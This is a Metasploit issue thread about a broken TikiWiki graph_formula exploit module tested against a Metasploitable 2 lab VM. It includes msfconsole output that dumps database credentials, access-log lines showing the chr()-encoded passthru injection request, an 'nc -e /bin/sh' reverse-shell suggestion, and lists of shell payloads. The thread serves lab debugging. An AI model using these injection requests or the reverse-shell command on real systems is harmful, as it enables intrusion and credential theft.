rapid7
the webapp "tikiwiki_graph_formula_exec" no longer works
Hi
I use metasploit (Framework: 6.4.50-dev / Console : 6.4.50-dev) from Kali Linux.
I want to use the "old" webapp "tikiwiki_graph_formula_exec" against metasploitable-2 (2010-04-27)
I use the payload "generic/shell_bind_tcp".
With others, i have the error message : All encoders failed to encode.
On msfconsole :
msf6 exploit(unix/webapp/tikiwiki_graph_formula_exec) > show options
Module options (exploit/unix/webapp/tikiwiki_graph_formula_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 10.0.0.84 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
URI /tikiwiki yes TikiWiki directory path
VHOST no HTTP server virtual host
Payload options (generic/shell_bind_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LPORT 4444 yes The listen port
RHOST 10.0.0.84 no The target address
Exploit target:
Id Name
-- ----
0 Automatic
View the full module info with the info, or info -d command.
When i run :
sf6 exploit(unix/webapp/tikiwiki_graph_formula_exec) > run
[*] Attempting to obtain database credentials...
[*] The server returned : 200 OK
[*] Server version : Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch
[*] TikiWiki database informations :
db_tiki : mysql
dbversion : 1.9
host_tiki : localhost
user_tiki : root
pass_tiki : root
dbs_tiki : tikiwiki195
[*] Attempting to execute our payload...
[*] Started bind TCP handler against 10.0.0.84:4444
[*] Exploit completed, but no session was created.
On the target, the file /var/log/apache2/access.log contains :
10.0.0.60 - - [06/Mar/2025:07:16:43 -0500] "GET /tikiwiki/tiki-graph_formula.php?w=948&h=194&s=103&min=387&max=456&f[]=x.sinh.passthru(chr(101).chr(99).chr(104).chr(111).chr(32).chr(89).chr(89).chr(89).chr(59).chr(99).chr(97).chr(116).chr(32).chr(100).chr(98).chr(47).chr(108).chr(111).chr(99).chr(97).chr(108).chr(46).chr(112).chr(104).chr(112).chr(59).chr(101).chr(99).chr(104).chr(111).chr(32).chr(89).chr(89).chr(89))&t=pdf&title= HTTP/1.1" 200 14976 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
10.0.0.60 - - [06/Mar/2025:07:16:43 -0500] "GET /tikiwiki/tiki-graph_formula.php?w=4&h=738&s=331&min=980&max=1065&f[]=x.asinh.RWQP\xd9\xe0\xd9t$\xf4_WRZ_)\xd2QPXY\x81\xc2\xfe\x01" 200 - "-" "-"
If i attack with TikiWiki_1.9.5_Exploit, it works.
The file /var/log/apache2/access.log contains :
10.0.0.60 - - [06/Mar/2025:07:30:43 -0500] "GET /tikiwiki/tiki-graph_formula.php?w=185&h=757&s=145&min=366&max=391&f[]=x.min.passthru(chr(101).chr(99).chr(104).chr(111).chr(32).chr(89).chr(89).chr(89).chr(59).chr(99).chr(97).chr(116).chr(32).chr(100).chr(98).chr(47).chr(108).chr(111).chr(99).chr(97).chr(108).chr(46).chr(112).chr(104).chr(112).chr(59).chr(101).chr(99).chr(104).chr(111).chr(32).chr(89).chr(89).chr(89))&t=pdf&title= HTTP/1.1" 200 21024 "-" "curl/8.12.1"
Try using simpler payload like
set PAYLOAD cmd/unix/generic set CMD "nc -e /bin/sh your-kali-ip 4444". that might work.
No :-( With these commands :
set PAYLOAD cmd/unix/generic
set CMD "nc -e /bin/sh 10.0.0.60 4444"
the run command shows :
[-] Exploit failed: cmd/unix/generic is not a compatible payload.
[*] Exploit completed, but no session was created.
Hi!
This issue has been left open with no activity for a while now.
We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here. If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!
As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.
![github-actions[bot] avatar](https://avatars.githubusercontent.com/in/15368?v=4 "Published by a pub.dev verified publisher"){kind=small}
Hi again!
It’s been 60 days since anything happened on this issue, so we are going to close it. Please keep in mind that I’m only a robot, so if I’ve closed this issue in error please feel free to reopen this issue or create a new one if you need anything else.
As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.
This module is ARCH_PHP:
https://github.com/rapid7/metasploit-framework/blob/54cdcc6731468e7577fc6674b357096d5c710841/modules/exploits/unix/webapp/tikiwiki_graph_formula_exec.rb#L43
The module includes the payload within PHP code.
https://github.com/rapid7/metasploit-framework/blob/54cdcc6731468e7577fc6674b357096d5c710841/modules/exploits/unix/webapp/tikiwiki_graph_formula_exec.rb#L202
Have you tried setting a compatible PHP payload?
msf6 exploit(unix/webapp/tikiwiki_graph_formula_exec) > set payload php/
set payload php/bind_perl set payload php/download_exec set payload php/meterpreter/bind_tcp_ipv6_uuid set payload php/reverse_perl
set payload php/bind_perl_ipv6 set payload php/exec set payload php/meterpreter/bind_tcp_uuid set payload php/reverse_php
set payload php/bind_php set payload php/meterpreter/bind_tcp set payload php/meterpreter/reverse_tcp
set payload php/bind_php_ipv6 set payload php/meterpreter/bind_tcp_ipv6 set payload php/meterpreter/reverse_tcp_uuid
msf6 exploit(unix/webapp/tikiwiki_graph_formula_exec) > show payloads
Compatible Payloads
===================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 payload/cmd/unix/bind_aws_instance_connect . normal No Unix SSH Shell, Bind Instance Connect (via AWS API)
1 payload/generic/custom . normal No Custom Payload
2 payload/generic/shell_bind_aws_ssm . normal No Command Shell, Bind SSM (via AWS API)
3 payload/generic/shell_bind_tcp . normal No Generic Command Shell, Bind TCP Inline
4 payload/generic/shell_reverse_tcp . normal No Generic Command Shell, Reverse TCP Inline
5 payload/generic/ssh/interact . normal No Interact with Established SSH Connection
6 payload/multi/meterpreter/reverse_http . normal No Architecture-Independent Meterpreter Stage, Reverse HTTP Stager (Multiple Architectures)
7 payload/multi/meterpreter/reverse_https . normal No Architecture-Independent Meterpreter Stage, Reverse HTTPS Stager (Multiple Architectures)
8 payload/php/bind_perl . normal No PHP Command Shell, Bind TCP (via Perl)
9 payload/php/bind_perl_ipv6 . normal No PHP Command Shell, Bind TCP (via perl) IPv6
10 payload/php/bind_php . normal No PHP Command Shell, Bind TCP (via PHP)
11 payload/php/bind_php_ipv6 . normal No PHP Command Shell, Bind TCP (via php) IPv6
12 payload/php/download_exec . normal No PHP Executable Download and Execute
13 payload/php/exec . normal No PHP Execute Command
14 payload/php/meterpreter/bind_tcp . normal No PHP Meterpreter, Bind TCP Stager
15 payload/php/meterpreter/bind_tcp_ipv6 . normal No PHP Meterpreter, Bind TCP Stager IPv6
16 payload/php/meterpreter/bind_tcp_ipv6_uuid . normal No PHP Meterpreter, Bind TCP Stager IPv6 with UUID Support
17 payload/php/meterpreter/bind_tcp_uuid . normal No PHP Meterpreter, Bind TCP Stager with UUID Support
18 payload/php/meterpreter/reverse_tcp . normal No PHP Meterpreter, PHP Reverse TCP Stager
19 payload/php/meterpreter/reverse_tcp_uuid . normal No PHP Meterpreter, PHP Reverse TCP Stager
20 payload/php/reverse_perl . normal No PHP Command, Double Reverse TCP Connection (via Perl)
21 payload/php/reverse_php . normal No PHP Command Shell, Reverse TCP (via PHP)
Today I tried unsuccessfully on the latest Kali Linux after update
msf6 exploit(unix/webapp/tikiwiki_graph_formula_exec) > set payload php/
set payload php/bind_perl set payload php/exec set payload php/meterpreter/reverse_tcp
set payload php/bind_perl_ipv6 set payload php/meterpreter/bind_tcp set payload php/meterpreter/reverse_tcp_uuid
set payload php/bind_php set payload php/meterpreter/bind_tcp_ipv6 set payload php/reverse_perl
set payload php/bind_php_ipv6 set payload php/meterpreter/bind_tcp_ipv6_uuid set payload php/reverse_php
set payload php/download_exec set payload php/meterpreter/bind_tcp_uuid
msf6 exploit(unix/webapp/tikiwiki_graph_formula_exec) > show payloads
Compatible Payloads
===================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 payload/cmd/unix/bind_aws_instance_connect . normal No Unix SSH Shell, Bind Instance Connect (via AWS API)
1 payload/generic/custom . normal No Custom Payload
2 payload/generic/shell_bind_aws_ssm . normal No Command Shell, Bind SSM (via AWS API)
3 payload/generic/shell_bind_tcp . normal No Generic Command Shell, Bind TCP Inline
4 payload/generic/shell_reverse_tcp . normal No Generic Command Shell, Reverse TCP Inline
5 payload/generic/ssh/interact . normal No Interact with Established SSH Connection
6 payload/multi/meterpreter/reverse_http . normal No Architecture-Independent Meterpreter Stage, Reverse HTTP Stager (Multiple Architectures)
7 payload/multi/meterpreter/reverse_https . normal No Architecture-Independent Meterpreter Stage, Reverse HTTPS Stager (Multiple Architectures)
8 payload/php/bind_perl . normal No PHP Command Shell, Bind TCP (via Perl)
9 payload/php/bind_perl_ipv6 . normal No PHP Command Shell, Bind TCP (via perl) IPv6
10 payload/php/bind_php . normal No PHP Command Shell, Bind TCP (via PHP)
11 payload/php/bind_php_ipv6 . normal No PHP Command Shell, Bind TCP (via php) IPv6
12 payload/php/download_exec . normal No PHP Executable Download and Execute
13 payload/php/exec . normal No PHP Execute Command
14 payload/php/meterpreter/bind_tcp . normal No PHP Meterpreter, Bind TCP Stager
15 payload/php/meterpreter/bind_tcp_ipv6 . normal No PHP Meterpreter, Bind TCP Stager IPv6
16 payload/php/meterpreter/bind_tcp_ipv6_uuid . normal No PHP Meterpreter, Bind TCP Stager IPv6 with UUID Support
17 payload/php/meterpreter/bind_tcp_uuid . normal No PHP Meterpreter, Bind TCP Stager with UUID Support
18 payload/php/meterpreter/reverse_tcp . normal No PHP Meterpreter, PHP Reverse TCP Stager
19 payload/php/meterpreter/reverse_tcp_uuid . normal No PHP Meterpreter, PHP Reverse TCP Stager
20 payload/php/reverse_perl . normal No PHP Command, Double Reverse TCP Connection (via Perl)
21 payload/php/reverse_php . normal No PHP Command Shell, Reverse TCP (via PHP)
msf6 exploit(unix/webapp/tikiwiki_graph_formula_exec) > set payload php/bind_perl
payload => php/bind_perl
msf6 exploit(unix/webapp/tikiwiki_graph_formula_exec) > run
[-] Exploit failed: php/bind_perl: All encoders failed to encode.
[*] Exploit completed, but no session was created
msf6 exploit(unix/webapp/tikiwiki_graph_formula_exec) > set payload php/bind_php
payload => php/bind_php
msf6 exploit(unix/webapp/tikiwiki_graph_formula_exec) > run
[-] Exploit failed: php/bind_php: All encoders failed to encode.
[*] Exploit completed, but no session was created.
msf6 exploit(unix/webapp/tikiwiki_graph_formula_exec) > set payload php/meterpreter/bind_tcp
payload => php/meterpreter/bind_tcp
msf6 exploit(unix/webapp/tikiwiki_graph_formula_exec) > run
[-] Exploit failed: php/meterpreter/bind_tcp: All encoders failed to encode.
[*] Exploit completed, but no session was created.
msf6 exploit(unix/webapp/tikiwiki_graph_formula_exec) > set payload php/meterpreter/bind_tcp_uuid
payload => php/meterpreter/bind_tcp_uuid
msf6 exploit(unix/webapp/tikiwiki_graph_formula_exec) > run
[-] Exploit failed: php/meterpreter/bind_tcp_uuid: All encoders failed to encode.
[*] Exploit completed, but no session was created.
msf6 exploit(unix/webapp/tikiwiki_graph_formula_exec) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/tikiwiki_graph_formula_exec) > run
[-] Exploit failed: php/meterpreter/reverse_tcp: All encoders failed to encode.
[*] Exploit completed, but no session was created.
msf6 exploit(unix/webapp/tikiwiki_graph_formula_exec) > set payload php/meterpreter/reverse_tcp_uuid
payload => php/meterpreter/reverse_tcp_uuid
msf6 exploit(unix/webapp/tikiwiki_graph_formula_exec) > run
[-] Exploit failed: php/meterpreter/reverse_tcp_uuid: All encoders failed to encode.
[*] Exploit completed, but no session was created.
msf6 exploit(unix/webapp/tikiwiki_graph_formula_exec) > set payload php/reverse_perl
payload => php/reverse_perl
msf6 exploit(unix/webapp/tikiwiki_graph_formula_exec) > run
[-] Exploit failed: php/reverse_perl: All encoders failed to encode.
[*] Exploit completed, but no session was created.
msf6 exploit(unix/webapp/tikiwiki_graph_formula_exec) > set payload php/reverse_php
payload => php/reverse_php
msf6 exploit(unix/webapp/tikiwiki_graph_formula_exec) > run
[-] Exploit failed: php/reverse_php: All encoders failed to encode.
[*] Exploit completed, but no session was created.
Looks like this module is broken.
The defined BadChars are quite restrictive:
https://github.com/rapid7/metasploit-framework/blob/b5129fe19874e74d5a103bb9d1372fb30f618b32/modules/exploits/unix/webapp/tikiwiki_graph_formula_exec.rb#L40
Unfortunately using a Base64 encoder (php/base64, php/minify, php/hex) will still use bad characters (' or ").
Can confirm this module doesn't work exploiting tikiwiki on Metasploitable 2 VM. Haven't tested with other tikiwiki instances.
